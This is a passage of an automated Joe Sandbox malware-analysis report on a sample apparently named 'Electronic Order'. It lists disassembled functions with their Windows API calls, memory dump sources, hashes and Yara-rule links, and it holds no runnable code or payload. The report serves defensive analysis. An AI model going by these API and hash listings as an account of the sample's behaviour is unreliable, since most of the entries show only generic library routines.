                                      • Instruction ID: 83dbc3b33363cff685422373fef23db2ee3abe715759e6002eb64457ed83bb19
                                      • Opcode Fuzzy Hash: d1ed22d670a6857b413a676da3ff991639cdfb6692a69597b03de4aec544d169
                                      • Instruction Fuzzy Hash: 1C115E36500509AFCB04EBA5EE9AEEEB7B9EF08710B144069F506B7161DF30AE44CB71
                                      Function 00E19023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E19043
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E19055
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E1906B
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E19086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: eedea39c56fad8b70629ff81c8091a487824b2ea41bf0c65707303d80acbd528
                                      • Instruction ID: 4f4940ce403f4bac863c074195d5f33f78c36124a2e6283554bf4e6a612487c9
                                      • Opcode Fuzzy Hash: eedea39c56fad8b70629ff81c8091a487824b2ea41bf0c65707303d80acbd528
                                      • Instruction Fuzzy Hash: BE115A79901218FFEB10DFA5CC84EEDBBB8FB48710F2040A5EA04B7290D6726E50DB90
                                      Function 00DC1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00DC12D8
                                      • GetClientRect.USER32(?,?), ref: 00DFB84B
                                      • GetCursorPos.USER32(?), ref: 00DFB855
                                      • ScreenToClient.USER32(?,?), ref: 00DFB860
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Client$CursorLongProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 4127811313-0
                                      • Opcode ID: 9a14361dc91c4ac9f3030411b2feff6424faf88bf733165f3303912243d8c93c
                                      • Instruction ID: 4585ab1eb2f9ef53dad6c2466b24fdacada75cc45d03ee2add66ceec1640352b
                                      • Opcode Fuzzy Hash: 9a14361dc91c4ac9f3030411b2feff6424faf88bf733165f3303912243d8c93c
                                      • Instruction Fuzzy Hash: 6B11EC3D90012AAFDB10DF95D886EBEB7B8FB06301F10445AE951E7151C730AA568BB9
                                      Function 00E21652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E201FD,?,00E21250,?,00008000), ref: 00E2166F
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E201FD,?,00E21250,?,00008000), ref: 00E21694
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E201FD,?,00E21250,?,00008000), ref: 00E2169E
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00E201FD,?,00E21250,?,00008000), ref: 00E216D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: 779efe3fa971b471df0734b9cc11aabc7a5bca05d1e4cb2fb6d2d66e2dfd604d
                                      • Instruction ID: 97177d725089cc4ec8a481d1048a57edcb9c3206d09aa8cc55ce0e88e55c18bd
                                      • Opcode Fuzzy Hash: 779efe3fa971b471df0734b9cc11aabc7a5bca05d1e4cb2fb6d2d66e2dfd604d
                                      • Instruction Fuzzy Hash: 98113C31C0152DDBCF00AFA6E948AEEBB78FF19751F054095E944B6240CB3056A4CBE6
                                      Function 00DF7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction ID: 4b9cc1de67c057dde2e115ce276a08a19b7724a375e2df6d331ae42ff6e9f10e
                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction Fuzzy Hash: 4A014C3604814EBBCF125E84DC018EE3F62BF69355B5AC615FB5858031D237C9B2ABA5
                                      Function 00E4B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00E4B59E
                                      • ScreenToClient.USER32(?,?), ref: 00E4B5B6
                                      • ScreenToClient.USER32(?,?), ref: 00E4B5DA
                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E4B5F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClientRectScreen$InvalidateWindow
                                      • String ID:
                                      • API String ID: 357397906-0
                                      • Opcode ID: af7fdd9febb8a440d6e11353566e7b242e09a0b497765d819769826b32f501e1
                                      • Instruction ID: 7e556acdbe1fe0224f6641058d7deada6281724e720b127743a03de1423b430c
                                      • Opcode Fuzzy Hash: af7fdd9febb8a440d6e11353566e7b242e09a0b497765d819769826b32f501e1
                                      • Instruction Fuzzy Hash: A81146B9D00209EFDB41CF99D4449EEFBF5FB09310F104166E915E3220D735AA558F91
                                      Function 00E4B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E4B8FE
                                      • _memset.LIBCMT ref: 00E4B90D
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E87F20,00E87F64), ref: 00E4B93C
                                      • CloseHandle.KERNEL32 ref: 00E4B94E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateHandleProcess
                                      • String ID:
                                      • API String ID: 3277943733-0
                                      • Opcode ID: f0e329acbbd3469a6be0c9bf9fc26e8febe9dd095a90ea04c33925ab6cab6cfe
                                      • Instruction ID: 564dfe55c2e04f430723b1e25103d9fcdb477301e1d9fc35c899c22399bbf78f
                                      • Opcode Fuzzy Hash: f0e329acbbd3469a6be0c9bf9fc26e8febe9dd095a90ea04c33925ab6cab6cfe
                                      • Instruction Fuzzy Hash: 25F05EB2658310BFE2103B67AC0AFBB3A9CEB09755F101060FB4CF6192D771990487B8
                                      Function 00E26E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 00E26E88
                                        • Part of subcall function 00E2794E: _memset.LIBCMT ref: 00E27983
                                      • _memmove.LIBCMT ref: 00E26EAB
                                      • _memset.LIBCMT ref: 00E26EB8
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E26EC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                      • String ID:
                                      • API String ID: 48991266-0
                                      • Opcode ID: 65e22003aeb8ec38e96b21f5640eda4aaa83e700cc607fdb7534cea245f97c09
                                      • Instruction ID: 9dd2fc3835906cf1e12104a596f6aea11ea4b0dd5d9ebf787559c46d8e6e7818
                                      • Opcode Fuzzy Hash: 65e22003aeb8ec38e96b21f5640eda4aaa83e700cc607fdb7534cea245f97c09
                                      • Instruction Fuzzy Hash: 06F0543A200210ABCF016F55EC85A4ABB69EF85320B048061FE086F227C771E951CBB4
                                      Function 00E4C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC134D
                                        • Part of subcall function 00DC12F3: SelectObject.GDI32(?,00000000), ref: 00DC135C
                                        • Part of subcall function 00DC12F3: BeginPath.GDI32(?), ref: 00DC1373
                                        • Part of subcall function 00DC12F3: SelectObject.GDI32(?,00000000), ref: 00DC139C
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E4C030
                                      • LineTo.GDI32(00000000,?,?), ref: 00E4C03D
                                      • EndPath.GDI32(00000000), ref: 00E4C04D
                                      • StrokePath.GDI32(00000000), ref: 00E4C05B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: 264b9ea22ef54327a06b541668216cfdcbc580b95f4294d8ff663c0f45af5504
                                      • Instruction ID: 549282bb92c3c3a57a4ded90aef065c5232b6bdd2bbc91d5d38b72ca80e74050
                                      • Opcode Fuzzy Hash: 264b9ea22ef54327a06b541668216cfdcbc580b95f4294d8ff663c0f45af5504
                                      • Instruction Fuzzy Hash: 5DF0BE39002269FFDB226F52AC0EFCE3F58AF06710F144000FA15320E287B5055ACBA5
                                      Function 00E1A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E1A399
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1A3AC
                                      • GetCurrentThreadId.KERNEL32 ref: 00E1A3B3
                                      • AttachThreadInput.USER32(00000000), ref: 00E1A3BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: bd10ed6bdd4cc193d05ab86e49838fd76230dd0731981846847768d44a94594d
                                      • Instruction ID: a003588233c585bf101ca45d9d70715be4a4131570e46b13bf7a65db637011ef
                                      • Opcode Fuzzy Hash: bd10ed6bdd4cc193d05ab86e49838fd76230dd0731981846847768d44a94594d
                                      • Instruction Fuzzy Hash: ECE01571542228BAEB211FA2DC0CFEB7E5CEF16BA1F048075F909A4060C671C5858BE0
                                      Function 00DC2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 00DC2231
                                      • SetTextColor.GDI32(?,000000FF), ref: 00DC223B
                                      • SetBkMode.GDI32(?,00000001), ref: 00DC2250
                                      • GetStockObject.GDI32(00000005), ref: 00DC2258
                                      • GetWindowDC.USER32(?,00000000), ref: 00DFC0D3
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DFC0E0
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00DFC0F9
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00DFC112
                                      • GetPixel.GDI32(00000000,?,?), ref: 00DFC132
                                      • ReleaseDC.USER32(?,00000000), ref: 00DFC13D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: b85f819f7d9dd4bcbe95176fe188454cbd282928d1920402e18cc62e010a337b
                                      • Instruction ID: 9daf090d25b3776f5e75c273d9c442bf0c486fbbe80385c52e2d8967dddfa719
                                      • Opcode Fuzzy Hash: b85f819f7d9dd4bcbe95176fe188454cbd282928d1920402e18cc62e010a337b
                                      • Instruction Fuzzy Hash: C5E06D36500248EEEB215FA5FC0DBE87B10EB06736F048366FB69681E287714996DB21
                                      Function 00E18C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 00E18C63
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E1882E), ref: 00E18C6A
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E1882E), ref: 00E18C77
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E1882E), ref: 00E18C7E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: 3602a8783bbcedc8d9d2bcaf062be4927b63fb680a0be6f04d31c737333a390b
                                      • Instruction ID: d1f0a3963183d43cbfc3ab9413ef548732adbc79620a598f5d4fca743d55f41c
                                      • Opcode Fuzzy Hash: 3602a8783bbcedc8d9d2bcaf062be4927b63fb680a0be6f04d31c737333a390b
                                      • Instruction Fuzzy Hash: 35E0863A642211DFD7205FB66E0CB977BACEF92B96F054828F245E9050DA34848ACB61
                                      Function 00E02187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00E02187
                                      • GetDC.USER32(00000000), ref: 00E02191
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E021B1
                                      • ReleaseDC.USER32(?), ref: 00E021D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 536b4827e0faa5031da8ad8396bf09bfe46e9745cea4de797d9e1d7c6417eee7
                                      • Instruction ID: a5320aff6b22a91a4025164d4b819912fed84a9aebbb7b031ccd23c18be989d5
                                      • Opcode Fuzzy Hash: 536b4827e0faa5031da8ad8396bf09bfe46e9745cea4de797d9e1d7c6417eee7
                                      • Instruction Fuzzy Hash: EAE0E579800605EFDB01AF62D808A9E7BF1EB4D750F128469FD5AA7260CB7881469F90
                                      Function 00E0219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00E0219B
                                      • GetDC.USER32(00000000), ref: 00E021A5
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E021B1
                                      • ReleaseDC.USER32(?), ref: 00E021D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: d73c28352eb8786da720eb67a64513f07b0b94fa61933d3a3741720d6c2a554c
                                      • Instruction ID: 53e73cf3d82d6f8f6c9ce4e09a5d74e72e0fbf30860f2c2351d851ab5fcbe4a0
                                      • Opcode Fuzzy Hash: d73c28352eb8786da720eb67a64513f07b0b94fa61933d3a3741720d6c2a554c
                                      • Instruction Fuzzy Hash: 4FE01A79800205EFCF01AF72C808A9E7BF1EB4D710F128069FD5AE7260CB7891469F90
                                      Function 00DC63A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %
                                      • API String ID: 0-2291192146
                                      • Opcode ID: 77282999bcb9f57263d13597bfdf36ccd2b3749b880d2e25f36f3435c84319ba
                                      • Instruction ID: 1b701d43f6e182cc5d52aae632a16bb4c149bba0f8718c22e89045b899ffc36e
                                      • Opcode Fuzzy Hash: 77282999bcb9f57263d13597bfdf36ccd2b3749b880d2e25f36f3435c84319ba
                                      • Instruction Fuzzy Hash: 67B16C7590420B9ACF14EF98C481FEEB7B4EF44310F64412EE952A7295DA34DE82CBB1
                                      Function 00E3B1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __itow_s
                                      • String ID: xr$xr
                                      • API String ID: 3653519197-2528877900
                                      • Opcode ID: dc34f60ed04ab49dc6f6394a00a7eca244eafe4987a279b183f7958fe81ef859
                                      • Instruction ID: 65eaedc81b18ea63362f5ffd3bcc02b169e9788778da81e2fa1e91dcbf5bd4eb
                                      • Opcode Fuzzy Hash: dc34f60ed04ab49dc6f6394a00a7eca244eafe4987a279b183f7958fe81ef859
                                      • Instruction Fuzzy Hash: 74B19170A00109EFCB14DF54C895EBEBBB9FF58304F149559FA46AB252EB70E941CB60
                                      Function 00E2B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DDFEC6: _wcscpy.LIBCMT ref: 00DDFEE9
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • __wcsnicmp.LIBCMT ref: 00E2B298
                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E2B361
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                      • String ID: LPT
                                      • API String ID: 3222508074-1350329615
                                      • Opcode ID: 751e400719b0628d565d1a72d58d2ba5b924fb5a49db0bfca3680abe6005cace
                                      • Instruction ID: 7bab96765ca6ef369cae42d313578b998378b62346d85310f4d8d00be364c01c
